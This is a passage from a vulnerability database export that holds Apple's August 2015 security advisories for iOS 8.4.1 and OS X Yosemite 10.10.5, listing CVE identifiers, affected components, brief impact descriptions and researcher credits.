to CSP.\r\nCVE-ID\r\nCVE-2015-3750 : Muneaki Nishimura (nishimunea)\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website can make a tap event produce a synthetic\r\nclick on another page\r\nDescription: An issue existed in how synthetic clicks are generated\r\nfrom tap events that could cause clicks to target other pages. The\r\nissue was addressed through restricted click propagation.\r\nCVE-ID\r\nCVE-2015-5759 : Phillip Moon and Matt Weston of Sandfield\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Content Security Policy report requests may leak cookies\r\nDescription: Two issues existed in how cookies were added to Content\r\nSecurity Policy report requests. Cookies were sent in cross-origin\r\nreport requests in violation of the standard. Cookies set during\r\nregular browsing were sent in private browsing. These issues were\r\naddressed through improved cookie handling.\r\nCVE-ID\r\nCVE-2015-3752 : Muneaki Nishimura (nishimunea)\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Image loading may violate a website's Content Security\r\nPolicy directive\r\nDescription: An issue existed where websites with video controls\r\nwould load images nested in object elements in violation of the\r\nwebsite's Content Security Policy directive. This issue was addressed\r\nthrough improved Content Security Policy enforcement.\r\nCVE-ID\r\nCVE-2015-3751 : Muneaki Nishimura (nishimunea)\r\n\r\n\r\nInstallation note:\r\n\r\nThis update is available through iTunes and Software Update on your\r\niOS device, and will not appear in your computer's Software Update\r\napplication, or in the Apple Downloads site. Make sure you have an\r\nInternet connection and have installed the latest version of iTunes\r\nfrom www.apple.com/itunes/\r\n\r\niTunes and Software Update on the device will automatically check\r\nApple's update server on its weekly schedule. When an update is\r\ndetected, it is downloaded and the option to be installed is\r\npresented to the user when the iOS device is docked. We recommend\r\napplying the update immediately if possible. Selecting Don't Install\r\nwill present the option the next time you connect your iOS device.\r\n\r\nThe automatic update process may take up to a week depending on the\r\nday that iTunes or the device checks for updates. You may manually\r\nobtain the update via the Check for Updates button within iTunes, or\r\nthe Software Update on your device.\r\n\r\nTo check that the iPhone, iPod touch, or iPad has been updated:\r\n\r\n* Navigate to Settings\r\n* Select General\r\n* Select About. The version after applying this update\r\nwill be "8.4.1".\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32392", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32392", "title": "APPLE-SA-2015-08-13-3 iOS 8.4.1", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to 